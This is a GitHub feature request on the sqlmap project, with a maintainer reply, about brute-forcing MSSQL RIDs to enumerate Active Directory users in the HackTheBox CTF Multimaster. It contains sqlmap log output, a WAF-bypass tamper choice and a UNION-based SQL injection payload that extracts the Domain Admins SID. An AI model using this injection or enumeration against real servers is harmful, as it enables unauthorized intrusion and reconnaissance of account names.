sqlmap
sqlmap copied to clipboard
sqlmapproject
MSSQL RID Bruteforce
Is your feature request related to a problem? Please describe. Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this....
[02:48:21] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): 'ԁ\\u0000\\u0000Ԁ\\u0015\\u0000\\u001c병臑䧱�㛂Ȁ\\u0000'
If I use the hex flag, it looks like this...
[08:40:26] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): '\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00'
I haven't had any luck at trying to decode this to the proper format. The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online. I was using the tamper charunicodeencode to bypass the WAF.
Describe the solution you'd like Implement a method of retreiving the SID from a MSSQL server, and bruteforce users RID to discover the usernames of users in AD.
Describe alternatives you've considered I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit alot of the code and still couldn't get it to work.
Additional context Incase you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.
Maybe this should be a bug report instead... I was able to manually execute this query,
-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, '')))-- -
but if I try with SQLMAP, it says...
[09:03:03] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
With the latest revision query bug should be fixed. Nevertheless, I have a feeling that something else will come up
